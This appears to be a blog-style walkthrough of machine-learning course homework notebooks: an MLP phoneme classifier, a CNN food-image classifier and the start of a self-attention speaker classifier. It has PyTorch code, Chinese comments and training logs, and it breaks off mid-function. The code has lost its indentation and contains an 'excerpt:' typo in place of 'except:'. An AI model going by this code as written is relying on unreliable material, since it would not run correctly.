    label = torch.LongTensor(label_dict[fname])

    X[idx: idx + cur_len, :] = feat
    if mode == 'train':
    y[idx: idx + cur_len] = label

    idx += cur_len

    # 去掉张量 X 和 y 中多余的部分(即在初始化时申请的空间)
    X = X[:idx, :]
    if mode == 'train':
    y = y[:idx]

    print(f'[INFO] {split} set')
    print(X.shape)
    # 返回处理后的张量 X(和可选的张量 y)
    if mode == 'train':
    print(y.shape)
    return X, y
    else:
    return X

    Dataset

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    import torch
    from torch.utils.data import Dataset

    class LibriDataset(Dataset):
    def __init__(self, X, y=None):
    self.data = X
    if y is not None:
    self.label = torch.LongTensor(y)
    else:
    self.label = None

    def __getitem__(self, idx):
    if self.label is not None:
    return self.data[idx], self.label[idx]
    else:
    return self.data[idx]

    def __len__(self):
    return len(self.data)

    Model

    Feel free to modify the structure of the model.

    请随意修改模型的结构。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    import torch.nn as nn

    class BasicBlock(nn.Module):
    def __init__(self, input_dim, output_dim):
    super(BasicBlock, self).__init__()
    '''
    BasicBlock 是一个基本的神经网络模块,包含一个全连接层和一个 ReLU 激活层。
    输入向量的维度是 input_dim,输出向量的维度是 output_dim
    '''
    self.block = nn.Sequential(
    nn.Linear(input_dim, output_dim),
    nn.ReLU(),
    )

    def forward(self, x):
    x = self.block(x)
    return x


    class Classifier(nn.Module):
    '''
    定义了一个名为 Classifier 的神经网络模型,包含几个 BasicBlock 模块。
    '''
    def __init__(self, input_dim, output_dim=41, hidden_layers=1, hidden_dim=256):
    '''
    input_dim: 输入向量的维度。
    output_dim: 输出向量的维度,即分类类别总数,默认为 41。
    hidden_layers: 隐藏层的数量,缺省值为 1。
    hidden_dim: 隐藏层的神经元数。
    '''
    super(Classifier, self).__init__()

    self.fc = nn.Sequential(
    # 首先通过一个 BasicBlock 将样本输入从 input_dim 维度降到 hidden_dim 维度
    BasicBlock(input_dim, hidden_dim),
    # 通过一个 for 循环堆叠多个 BasicBlock 来增加模型深度和表达能力
    *[BasicBlock(hidden_dim, hidden_dim) for _ in range(hidden_layers)],
    # 通过一个全连接层将输出映射到 output_dim 维度上,完成整个分类任务。
    nn.Linear(hidden_dim, output_dim)
    )

    def forward(self, x):
    x = self.fc(x)
    return x

    Hyper-parameters

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    # data prarameters 数据参数
    # 要连接的帧数,n 必须是奇数(总共 2k+1=n 帧)
    concat_nframes = 3 # the number of frames to concat with, n must be odd (total 2k+1 = n frames)
    # 用于训练的数据比例,其余数据将用于验证
    train_ratio = 0.75 # the ratio of data used for training, the rest will be used for validation

    # training parameters 训练参数
    seed = 1213 # random seed 随机数种子
    batch_size = 512 # batch size 批大小
    num_epoch = 10 # the number of training epoch,epoch 次数
    learning_rate = 1e-4 # learning rate 学习率
    model_path = './model.ckpt' # the path where the checkpoint will be saved 检查点保存位置

    # model parameters 模型参数
    # 模型的输入维数,不应更改该值
    input_dim = 39 * concat_nframes # the input dim of the model, you should not change the value
    # 隐藏层数
    hidden_layers = 2 # the number of hidden layers
    # 隐藏层维数
    hidden_dim = 64 # the hidden dim

    Dataloader

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    from torch.utils.data import DataLoader
    import gc # 导入 gc 模块,用于进行垃圾回收操作

    same_seeds(seed) # 设置了随机数的种子
    # 根据是否有 GPU 加速设备来确定程序的运行设备
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    print(f'DEVICE: {device}')

    # preprocess data
    # 通过 preprocess_data() 函数对训练数据和验证数据进行预处理,并将其存储到 train_X、train_y、val_X 和 val_y 这四个变量中
    train_X, train_y = preprocess_data(split='train',
    # 语音特征文件所在目录的路径
    feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat',
    # 语音标签文件所在的路径
    phone_path='/kaggle/input/ml2023spring-hw2/libriphone',
    # 将前后几帧的音频特征拼接成新的特征向量
    concat_nframes=concat_nframes,
    # 训练集和验证集的划分比例
    train_ratio=train_ratio)
    val_X, val_y = preprocess_data(split='val',
    feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat',
    phone_path='/kaggle/input/ml2023spring-hw2/libriphone',
    concat_nframes=concat_nframes,
    train_ratio=train_ratio)

    ## get dataset
    '''
    使用数据集的类 LibriDataset 对每个数据集进行实例化,
    传入训练集和验证集的 X 和 y(即上一步中得到的 train_X, train_y 和 val_X, val_y),
    并将其赋值给 train_set 和 val_set 变量。
    '''
    train_set = LibriDataset(train_X, train_y)
    val_set = LibriDataset(val_X, val_y)

    # remove raw feature to save memory
    del train_X, train_y, val_X, val_y # 为了释放内存,删除 train_X, train_y, val_X 和 val_y 这四个变量
    gc.collect() # 用 gc.collect() 释放所有未引用的内存

    ## get dataloader
    '''
    使用 DataLoader 类为训练集和验证集创建 DataLoader 实例,
    指定批次大小 batch_size 和是否需要打乱数据 shuffle,
    并将其赋值给 train_loader 和 val_loader 变量,以供模型训练时使用
    '''
    train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True)
    val_loader = DataLoader(val_set, batch_size=batch_size, shuffle=False)
    DEVICE: cuda[Dataset] - # phone classes: 41, number of utterances for train: 25712571it [00:23, 107.38it/s][INFO] train settorch.Size([1588590, 117])torch.Size([1588590])[Dataset] - # phone classes: 41, number of utterances for val: 858858it [00:02, 308.31it/s][INFO] val settorch.Size([525078, 117])torch.Size([525078])

    Training

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    # create model, define a loss function, and optimizer
    '''
    创建了一个用于分类的模型实例,
    这里使用了 Classifier 类,指定了输入数据的维度 input_dim、隐藏层的数量 hidden_layers 和每个隐藏层的维度 hidden_dim。
    并将其移动到之前确定的设备中。
    '''
    model = Classifier(input_dim=input_dim, hidden_layers=hidden_layers, hidden_dim=hidden_dim).to(device)
    # 定义交叉熵损失函数 nn.CrossEntropyLoss()
    criterion = nn.CrossEntropyLoss()
    # 优化器 Adam,将模型的参数传入优化器中,以便进行反向传播来更新权重。
    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)

    best_acc = 0.0
    for epoch in range(num_epoch): # 开始对模型进行训练,循环执行 num_epoch 次
    # 在每次循环的时候,将 train_acc 和 train_loss、val_acc 和 val_loss 分别初始化为 0
    train_acc = 0.0
    train_loss = 0.0
    val_acc = 0.0
    val_loss = 0.0

    # training 将模型设为“训练模式”
    model.train() # set the model to training mode
    for i, batch in enumerate(tqdm(train_loader)): # 对 train_loader 中的每个 batch 进行循环操作
    # 在每个 batch 中,将 features 和 labels 数据移动到之前设置的设备上(即 device)
    features, labels = batch
    features = features.to(device)
    labels = labels.to(device)

    # 将模型中的梯度设置为 0
    optimizer.zero_grad()
    # 使用模型对 features 进行前向传播,得到预测结果 outputs
    outputs = model(features)

    # 计算损失值 loss
    loss = criterion(outputs, labels)
    # 通过反向传播计算出梯度
    loss.backward()
    # 更新模型参数
    optimizer.step()

    # 获取预测结果中的最大值
    _, train_pred = torch.max(outputs, 1) # get the index of the class with the highest probability
    # 将其与标签进行比较,得到得到 train_acc 的值
    '''
    train_pred 是模型在训练集上的预测结果,labels 是该 batch 中样本的标签。
    train_pred.detach() 和 labels.detach() 是为了防止其梯度反向传播而被计算的前后关联(detach 方法是将一个 tensor 从计算图中分离出来,不再参与自动求导)。
    通过 train_pred.detach() == labels.detach() 的判断,得到一个 boolean 类型的 Tensor,表示模型预测结果是否正确。
    接着对这个 Tensor 进行 sum() 操作,计算其中 True 的元素个数,即预测正确的样本数。
    最后使用 item() 方法将结果作为 Python 的 float 类型,累加到 train_acc 变量中。
    '''
    train_acc += (train_pred.detach() == labels.detach()).sum().item()
    # 将损失值加入 train_loss 中
    train_loss += loss.item()

    # validation
    model.eval() # set the model to evaluation mode 将模型设为“评估模式”
    with torch.no_grad():
    for i, batch in enumerate(tqdm(val_loader)): # 对 val_loader 中的每个 batch 进行循环操作
    features, labels = batch
    features = features.to(device)
    labels = labels.to(device)
    outputs = model(features) # 调用模型进行前向计算

    loss = criterion(outputs, labels) # 计算 loss 损失值

    _, val_pred = torch.max(outputs, 1)
    # 计算出预测准确率 val_acc 和 val_loss
    val_acc += (val_pred.cpu() == labels.cpu()).sum().item() # get the index of the class with the highest probability
    val_loss += loss.item()
    # 在每个 epoch 结束后,计算出 train_acc、train_loss、val_acc 和 val_loss 的平均值,并将其输出以监控训练过程
    print(f'[{epoch+1:03d}/{num_epoch:03d}] Train Acc: {train_acc/len(train_set):3.5f} Loss: {train_loss/len(train_loader):3.5f} | Val Acc: {val_acc/len(val_set):3.5f} loss: {val_loss/len(val_loader):3.5f}')

    # if the model improves, save a checkpoint at this epoch
    """
    如果当前模型的验证准确率 val_acc 超过了之前的最佳准确率 best_acc,
    则将 best_acc 更新为当前的 val_acc 值,
    将模型的参数保存到指定文件名的模型路径 model_path 中,
    并输出日志记录保存的模型及其准确率值。
    """
    if val_acc > best_acc:
    best_acc = val_acc
    torch.save(model.state_dict(), model_path)
    print(f'saving model with acc {best_acc/len(val_set):.5f}')

    100%|██████████| 3103/3103 [00:19<00:00, 156.88it/s]100%|██████████| 1026/1026 [00:03<00:00, 273.11it/s][001/010] Train Acc: 0.39279Loss: 2.21685 | Val Acc: 0.43877 loss: 1.97101saving model with acc 0.43877100%|██████████| 3103/3103 [00:17<00:00, 175.27it/s]100%|██████████| 1026/1026 [00:03<00:00, 277.94it/s]

    ……

    [009/010] Train Acc: 0.49606Loss: 1.72781 | Val Acc: 0.49852 loss: 1.71150saving model with acc 0.49852100%|██████████| 3103/3103 [00:17<00:00, 180.14it/s]100%|██████████| 1026/1026 [00:04<00:00, 241.12it/s][010/010] Train Acc: 0.49840Loss: 1.71736 | Val Acc: 0.50044 loss: 1.70057saving model with acc 0.50044


    1
    2
    3
    del train_set, val_set
    del train_loader, val_loader
    gc.collect()
    23

    Testing

    Create a testing dataset, and load model from the saved checkpoint.

    1
    2
    3
    4
    # load data
    test_X = preprocess_data(split='test', feat_dir='/kaggle/input/ml2023spring-hw2/libriphone/feat', phone_path='/kaggle/input/ml2023spring-hw2/libriphone', concat_nframes=concat_nframes)
    test_set = LibriDataset(test_X, None)
    test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False)
    [Dataset] - # phone classes: 41, number of utterances for test: 857857it [00:08, 103.10it/s][INFO] test settorch.Size([527364, 117])


    1
    2
    3
    ## load model
    model = Classifier(input_dim=input_dim, hidden_layers=hidden_layers, hidden_dim=hidden_dim).to(device)
    model.load_state_dict(torch.load(model_path))
    <All keys matched successfully>

    Make prediction.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    pred = np.array([], dtype=np.int32)  # 创建一个空的 numpy 数组 pred,其数据类型为 np.int32

    model.eval() # 将模型设置为“评估模式”
    with torch.no_grad(): # 使用 with torch.no_grad() 上下文管理器,以避免在评估模式下无意中修改了梯度。
    for i, batch in enumerate(tqdm(test_loader)): # 在 test_loader 上进行循环操作,每次从中取出一个 batch,并将其转换到指定的设备 device 上
    # 使用模型对 features 进行前向传播,得到预测结果 outputs
    features = batch
    features = features.to(device)

    outputs = model(features)

    # 通过 torch.max(outputs, 1) 可以得到每个样本在每个类别上的分数,
    # _ 表示分数张量,test_pred 是在第 1 维度(即类别)上具有最大值的索引,代表模型预测的类别
    _, test_pred = torch.max(outputs, 1) # get the index of the class with the highest probability
    # 将 test_pred 转回 numpy 数组,并使用 np.concatenate() 方法将其与之前的 pred 数组进行拼接,生成更新后的预测结果
    pred = np.concatenate((pred, test_pred.cpu().numpy()), axis=0)
    # 最终,当所有测试集的样本都被预测完毕后,pred 数组中将保存模型在测试集上的所有预测结果。
    100%|██████████| 1031/1031 [00:01<00:00, 533.21it/s]

    Write prediction to a CSV file.

    After finish running this block, download the file prediction.csv from the files section on the left-hand side and submit it to Kaggle.

    1
    2
    3
    4
    with open('prediction.csv', 'w') as f:
    f.write('Id,Class\n')
    for i, y in enumerate(pred):
    f.write('{},{}\n'.format(i, y))

    HW3 Image Classification

    Solve image classification with convolutional neural networks(CNN).

    使用卷积神经网络处理图像分类问题。

    If you have any questions, please contact the TAs via TA hours, NTU COOL, or email to mlta-2023-spring@googlegroups.com

    1
    2
    # check GPU type.
    !nvidia-smi
    Tue May  2 10:05:59 2023       +-----------------------------------------------------------------------------+| NVIDIA-SMI 470.161.03   Driver Version: 470.161.03   CUDA Version: 11.4     ||-------------------------------+----------------------+----------------------+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC || Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. ||                               |                      |               MIG M. ||===============================+======================+======================||   0  Tesla P100-PCIE...  Off  | 00000000:00:04.0 Off |                    0 || N/A   33C    P0    25W / 250W |      0MiB / 16280MiB |      0%      Default ||                               |                      |                  N/A |+-------------------------------+----------------------+----------------------+                                                                               +-----------------------------------------------------------------------------+| Processes:                                                                  ||  GPU   GI   CI        PID   Type   Process name                  GPU Memory ||        ID   ID                                                   Usage      ||=============================================================================||  No running processes found                                                 |+-----------------------------------------------------------------------------+

    Import Packages

    1
    _exp_name = "sample"
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    # Import necessary packages.
    import numpy as np
    import pandas as pd
    import torch
    import os
    import torch.nn as nn
    import torchvision.transforms as transforms
    from PIL import Image
    # "ConcatDataset" and "Subset" are possibly useful when doing semi-supervised learning.
    # 在进行半监督学习时,“ConcatDataset”和“Subset”可能很有用。
    from torch.utils.data import ConcatDataset, DataLoader, Subset, Dataset
    from torchvision.datasets import DatasetFolder, VisionDataset
    # This is for the progress bar.
    from tqdm.auto import tqdm
    import random
    1
    2
    3
    4
    5
    6
    7
    myseed = 6666  # set a random seed for reproducibility
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(myseed)
    torch.manual_seed(myseed)
    if torch.cuda.is_available():
    torch.cuda.manual_seed_all(myseed)

    Transforms

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    # Normally, We don't need augmentations in testing and validation.
    # 通常情况下,我们不需要在测试和验证中进行增强。
    # All we need here is to resize the PIL image and transform it into Tensor.
    # 这里我们所需要的只是调整 PIL 图像的大小并将其转换为张量。
    test_tfm = transforms.Compose([
    transforms.Resize((128, 128)),
    transforms.ToTensor(),
    ])

    # However, it is also possible to use augmentation in the testing phase.
    # 然而,在测试阶段也可以使用增强功能。
    # You may use train_tfm to produce a variety of images and then test using ensemble methods
    # 您可以使用 train_tfm 生成各种图像,然后使用集成方法进行测试
    train_tfm = transforms.Compose([
    # Resize the image into a fixed shape (height = width = 128)
    transforms.Resize((128, 128)),
    # You may add some transforms here.

    # ToTensor() should be the last one of the transforms. ToTensor()应该是最后一个 transform。
    transforms.ToTensor(),
    ])

    Datasets

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    class FoodDataset(Dataset):
    '''
    该类继承了 PyTorch 中的 Dataset 类,是将数据导入 PyTorch 模型中训练和测试所必需的组件之一
    '''

    def __init__(self,path,tfm=test_tfm,files = None):
    '''
    用于初始化该类,其中 path 是数据集的路径,tfm 是一个可选参数,代表数据预处理的方法(默认为 test_tfm),
    files 是一个可选参数,是指要加载的文件列表(默认为 None)。
    '''
    super(FoodDataset).__init__()
    self.path = path
    # 在初始化时,根据给定的路径获取图片文件列表 self.files,并排序,
    self.files = sorted([os.path.join(path,x) for x in os.listdir(path) if x.endswith(".jpg")])
    # 若 files 不为 None,则使用 files 中指定的文件列表。接着对输入图片进行数据预处理,并将其转化为张量。
    if files != None:
    self.files = files

    self.transform = tfm

    def __len__(self):
    '''
    获取该数据集的长度
    '''
    return len(self.files)

    def __getitem__(self,idx):
    '''
    用于获取指定索引 idx 的样本,并将其转换为模型所需的数据格式。
    '''
    # 该函数会根据 idx 获取 self.files 中对应位置的图片文件名 fname
    fname = self.files[idx]
    # 读取图片文件为 PIL.Image 格式的对象 im
    im = Image.open(fname)
    # 通过 transform 对象对 im 进行数据预处理,并将结果转换为 torch.Tensor 格式的张量
    im = self.transform(im)

    # 通过解析文件名 fname 获取样本的标签 label,若 fname 的名称格式不符,则将 label 设为 -1(test 数据集没有 label)。
    try:
    label = int(fname.split("/")[-1].split("_")[0])
    excerpt:
    label = -1 # test has no label

    return im,label

    Model

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    class Classifier(nn.Module):
    def __init__(self):
    super(Classifier, self).__init__()
    # torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
    # torch.nn.MaxPool2d(kernel_size, stride, padding)
    # input 維度 [3, 128, 128]
    self.cnn = nn.Sequential(
    nn.Conv2d(3, 64, 3, 1, 1), # [64, 128, 128]
    nn.BatchNorm2d(64),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [64, 64, 64]

    nn.Conv2d(64, 128, 3, 1, 1), # [128, 64, 64]
    nn.BatchNorm2d(128),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [128, 32, 32]

    nn.Conv2d(128, 256, 3, 1, 1), # [256, 32, 32]
    nn.BatchNorm2d(256),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [256, 16, 16]

    nn.Conv2d(256, 512, 3, 1, 1), # [512, 16, 16]
    nn.BatchNorm2d(512),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [512, 8, 8]

    nn.Conv2d(512, 512, 3, 1, 1), # [512, 8, 8]
    nn.BatchNorm2d(512),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [512, 4, 4]
    )
    self.fc = nn.Sequential(
    nn.Linear(512*4*4, 1024),
    nn.ReLU(),
    nn.Linear(1024, 512),
    nn.ReLU(),
    nn.Linear(512, 11)
    )

    def forward(self, x):
    out = self.cnn(x)
    out = out.view(out.size()[0], -1) # flatten
    return self.fc(out)

    Configurations

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    # "cuda" only when GPUs are available.
    device = "cuda" if torch.cuda.is_available() else "cpu"

    # Initialize a model, and put it on the device specified.
    model = Classifier().to(device)

    # The number of batch size.
    batch_size = 64

    # The number of training epochs.
    n_epochs = 8

    # If no improvement in 'patience' epochs, early stop.
    patience = 300

    # For the classification task, we use cross-entropy as the measurement of performance.
    criterion = nn.CrossEntropyLoss()

    # Initialize optimizer, you may fine-tune some hyperparameters such as learning rate on your own.
    optimizer = torch.optim.Adam(model.parameters(), lr=0.0003, weight_decay=1e-5)

    Dataloader

    1
    2
    3
    4
    5
    6
    # Construct train and valid datasets.
    # The argument "loader" tells how torchvision reads the data.
    train_set = FoodDataset("/kaggle/input/ml2023spring-hw3/train", tfm=train_tfm)
    train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True)
    valid_set = FoodDataset("/kaggle/input/ml2023spring-hw3/valid", tfm=test_tfm)
    valid_loader = DataLoader(valid_set, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True)

    Start Training

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    # Initialize trackers, these are not parameters and should not be changed
    stale = 0
    best_acc = 0

    for epoch in range(n_epochs):

    # ---------- Training ----------
    # Make sure the model is in train mode before training.
    model.train()

    # These are used to record information in training.
    train_loss = []
    train_accs = []

    for batch in tqdm(train_loader):

    # A batch consists of image data and corresponding labels.
    imgs, labels = batch
    #imgs = imgs.half()
    #print(imgs.shape,labels.shape)

    # Forward the data. (Make sure data and model are on the same device.)
    logits = model(imgs.to(device))

    # Calculate the cross-entropy loss.
    # We don't need to apply softmax before computing cross-entropy as it is done automatically.
    # 在计算交叉熵之前,我们不需要应用 softmax,因为它是自动完成的。
    loss = criterion(logits, labels.to(device))

    # Gradients stored in the parameters in the previous step should be cleared out first.
    # 应首先清除上一步中存储在参数中的梯度。
    optimizer.zero_grad()

    # Compute the gradients for parameters.
    loss.backward()

    # Clip the gradient norms for stable training.
    '''
    该代码调用了 PyTorch 中 nn.utils.clip_grad_norm_() 方法,该方法旨在对梯度进行截断,并返回一个梯度范数。
    该方法接收两个参数:第一个参数是模型的参数,即 model.parameters(),
    第二个参数是一个 float 类型的变量,表示梯度的最大范数(即 L2 范数)。
    在这里,max_norm 的值被设置为 10。
    '''
    grad_norm = nn.utils.clip_grad_norm_(model.parameters(), max_norm=10)

    # Update the parameters with computed gradients.
    optimizer.step()

    # Compute the accuracy for current batch.
    acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()

    # Record the loss and accuracy.
    train_loss.append(loss.item())
    train_accs.append(acc)

    train_loss = sum(train_loss) / len(train_loss)
    train_acc = sum(train_accs) / len(train_accs)

    # Print the information.
    print(f"[ Train | {epoch + 1:03d}/{n_epochs:03d} ] loss = {train_loss:.5f}, acc = {train_acc:.5f}")

    # ---------- Validation ----------
    # Make sure the model is in eval mode so that some modules like dropout are disabled and work normally.
    model.eval()

    # These are used to record information in validation.
    valid_loss = []
    valid_accs = []

    # Iterate the validation set by batches.
    for batch in tqdm(valid_loader):

    # A batch consists of image data and corresponding labels.
    imgs, labels = batch
    #imgs = imgs.half()

    # We don't need gradient in validation.
    # Using torch.no_grad() accelerates the forward process.
    with torch.no_grad():
    logits = model(imgs.to(device))

    # We can still compute the loss (but not the gradient).
    loss = criterion(logits, labels.to(device))

    # Compute the accuracy for current batch.
    acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()

    # Record the loss and accuracy.
    valid_loss.append(loss.item())
    valid_accs.append(acc)
    #break

    # The average loss and accuracy for entire validation set is the average of the recorded values.
    valid_loss = sum(valid_loss) / len(valid_loss)
    valid_acc = sum(valid_accs) / len(valid_accs)

    # Print the information.
    print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f}")


    # update logs
    if valid_acc > best_acc:
    with open(f"./{_exp_name}_log.txt","a"):
    print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f} -> best")
    else:
    with open(f"./{_exp_name}_log.txt","a"):
    print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f}")


    # save models
    if valid_acc > best_acc:
    print(f"Best model found at epoch {epoch}, saving model")
    torch.save(model.state_dict(), f"{_exp_name}_best.ckpt") # only save best to prevent output memory exceed error
    best_acc = valid_acc
    stale = 0
    else:
    stale += 1
    if stale > patience:
    print(f"No improvment {patience} consecutive epochs, early stopping")
    break
      0%|          | 0/157 [00:00<?, ?it/s][ Train | 001/008 ] loss = 1.87167, acc = 0.34385  0%|          | 0/57 [00:00<?, ?it/s][ Valid | 001/008 ] loss = 1.87423, acc = 0.34339[ Valid | 001/008 ] loss = 1.87423, acc = 0.34339 -> bestBest model found at epoch 0, saving model

    ……

    [ Train | 008/008 ] loss = 0.66352, acc = 0.77070  0%|          | 0/57 [00:00<?, ?it/s][ Valid | 008/008 ] loss = 1.28541, acc = 0.58910[ Valid | 008/008 ] loss = 1.28541, acc = 0.58910

    Dataloader for test

    1
    2
    3
    4
    # Construct test datasets.
    # The argument "loader" tells how torchvision reads the data.
    test_set = FoodDataset("/kaggle/input/ml2023spring-hw3/test", tfm=test_tfm)
    test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False, num_workers=0, pin_memory=True)

    Testing and generate prediction CSV

    1
    2
    3
    4
    5
    6
    7
    8
    9
    model_best = Classifier().to(device)
    model_best.load_state_dict(torch.load(f"{_exp_name}_best.ckpt"))
    model_best.eval()
    prediction = []
    with torch.no_grad():
    for data,_ in tqdm(test_loader):
    test_pred = model_best(data.to(device))
    test_label = np.argmax(test_pred.cpu().data.numpy(), axis=1)
    prediction += test_label.squeeze().tolist()
      0%|          | 0/47 [00:00<?, ?it/s]
    1
    2
    3
    4
    5
    6
    7
    #create test csv
    def pad4(i):
    return "0"*(4-len(str(i)))+str(i)
    df = pd.DataFrame()
    df["Id"] = [pad4(i) for i in range(len(test_set))]
    df["Category"] = prediction
    df.to_csv("submission.csv",index = False)

    HW4 Self-attention

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    # ---初始化---
    import numpy as np
    import torch
    import random

    def set_seed(seed):
    np.random.seed(seed)
    random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
    torch.cuda.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.benchmark = False
    torch.backends.cudnn.deterministic = True

    set_seed(114514)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    # --- Dataset ---
    import os
    import json
    import torch
    import random
    from pathlib import Path
    from torch.utils.data import Dataset
    from torch.nn.utils.rnn import pad_sequence

    class myDataset(Dataset):
    def __init__(self, data_dir, segment_len=128):
    '''
    data_dir 是指音频文件的路径
    segment_len 是指每个音频片段的长度(默认为 128)
    '''
    self.data_dir = data_dir
    self.segment_len = segment_len

    # 加载从名字到 id 的映射 读取数据集文件夹中的 mapping.json
    mapping_path = Path(data_dir) / "mapping.json"
    mapping = json.load(mapping_path.open())
    self.speaker2id = mapping["speaker2id"] # 演讲者名称到 ID

    # 加载元数据
    metadata_path = Path(data_dir) / "metadata.json"
    metadata = json.load(open(metadata_path))["speakers"] # 包含了所有演讲者的语音数据信息

    # Get the total number of speaker.
    self.speaker_num = len(metadata.keys())
    self.data = []

    # 建立语音->ID 的数据
    for speaker in metadata.keys(): # 遍历 metadata.json 文件中 speakers 字段中的所有键值对
    for utterances in metadata[speaker]:
    # 将形如 [utterances["feature_path"], self.speaker2id[speaker]] 的数据添加到 self.data 中
    self.data.append([utterances["feature_path"], self.speaker2id[speaker]])


    def __len__(self):
    '''
    返回音频片段数量
    '''
    return len(self.data)

    def __getitem__(self, index):
    feat_path, speaker = self.data[index]
    # 元数据的语音 & 名字 ID
    # 打开音频文件?
    mel = torch.load(os.path.join(self.data_dir,feat_path))

    # 将 mel-spectrogram 分割成 长度为"segment_len" 帧.
    if len(mel) > self.segment_len:
    # 随机截取一段,先随机起点,然后开读
    start = random.randint(0, len(mel) - self.segment_len)
    mel = torch.FloatTensor(mel[start:start+self.segment_len])
    else:
    mel = torch.FloatTensor(mel)
    # 强转转成 long
    speaker = torch.FloatTensor([speaker]).long()
    # 返回真音频 ID
    return mel, speaker

    def get_speaker_number(self):
    '''
    返回数据集中演讲者数量
    '''
    return self.speaker_num
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    # --- Dataloader ---
    import torch
    from torch.utils.data import DataLoader, random_split
    from torch.nn.utils.rnn import pad_sequence


    def collate_batch(batch):
    # Process features within a batch.
    """Collate a batch of data."""
    mel, speaker = zip(*batch)
    # 因为我们一批一批地训练模型,所以我们需要在同一批中填充特征,以使它们的长度相同。
    # 对于较短的 mel 音频特征,pad_sequence 函数会自动添加 0 填充。
    # 这样,在训练神经网络时,不同长度的 mel 特征就可以组成一个 batch 进行训练了。
